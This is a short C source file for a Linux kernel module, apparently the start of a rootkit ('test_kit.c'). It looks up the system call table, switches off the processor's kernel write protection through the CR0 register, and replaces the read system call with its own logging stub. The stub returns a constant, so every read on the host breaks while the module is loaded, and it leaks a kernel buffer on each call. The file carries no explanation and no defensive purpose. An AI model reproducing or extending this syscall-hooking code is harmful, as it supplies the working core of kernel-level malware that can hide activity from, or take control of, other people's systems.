test_kit.c

1. #include <linux/module.h>
2. #include <linux/slab.h>
3. #include <linux/string.h>
4. #include <linux/moduleparam.h>
5. #include <linux/kernel.h>
6. #include <linux/init.h>
7. #include <linux/tty.h>
8. #include <linux/unistd.h>
9. #include <linux/syscalls.h>
10.  
11. #include <asm/ptrace.h>
12. #include <asm/uaccess.h>
13. #include <asm/cacheflush.h>
14. #include <linux/sched.h>
15. #include <linux/file.h>
16. #include <linux/proc_fs.h>
17. #include <linux/dirent.h>
18. #include <net/tcp.h>
19.  
20.  
21. MODULE_LICENSE("GPL");
22. unsigned long *sys_call_table;
23. unsigned long ( *original_read ) ( const struct pt_regs *regs );
24.  
25.  
26. static inline void rw_enable( void ) {
27. asm volatile ( "cli \n"
28. "pushq %rax \n"
29. "movq %cr0, %rax \n"
30. "andq $0xfffffffffffeffff, %rax \n"
31. "movq %rax, %cr0 \n"
32. "popq %rax " );
33. }
34.  
35. static inline uint64_t getcr0(void) {
36. register uint64_t ret = 0;
37. asm volatile (
38. "movq %%cr0, %0\n"
39. :"=r"(ret)
40. );
41. return ret;
42. }
43.  
44. static inline void rw_disable( register uint64_t val ) {
45. asm volatile(
46. "movq %0, %%cr0\n"
47. "sti "
48. :
49. :"r"(val)
50. );
51. }
52.  
53.  
54.  
55.  
56.  
57. unsigned long test_read(const struct pt_regs *regs){
58.  
59. printk(KERN_INFO "Inside test_read");
60. unsigned int fd = regs->di;
61. char *buf = (char*) regs->si;
62.  
63. int i;
64. unsigned long r=1;
65.  
66. char *kbuf=(char*)kmalloc(256,GFP_KERNEL);
67. printk(KERN_INFO "File descriptor\n");
68. printk(KERN_CONT "%lu",fd);
69. printk(KERN_INFO "User Buffer\n");
70. printk(KERN_CONT "%p",buf);
71. return r;
72.  
73. }
74.  
75. static int __init kit_start(void)
76. {
77. sys_call_table = kallsyms_lookup_name("sys_call_table");
78. printk(KERN_INFO "System call addresss ");
79. printk(KERN_CONT "%p",sys_call_table);
80. original_read = (void *)sys_call_table[__NR_read];
81. printk(KERN_INFO "Original read address ");
82. printk(KERN_CONT "%p",original_read);
83.  
84.  
85. register uint64_t cr0;
86. cr0 = getcr0();
87. rw_enable();
88. sys_call_table[__NR_read]=test_read;
89. rw_disable( cr0 );
90.  
91. return 0;
92. }
93.  
94.  
95. /*delete module rmmod*/
96. void __exit kit_exit(void)
97. {
98. printk(KERN_INFO "Exiting");
99. register uint64_t cr0;
100. cr0 = getcr0();
101. rw_enable();
102. sys_call_table[ __NR_read ] = original_read;
103. rw_disable( cr0 );
104.  
105. }
106.  
107. module_init(kit_start);
108. module_exit(kit_exit);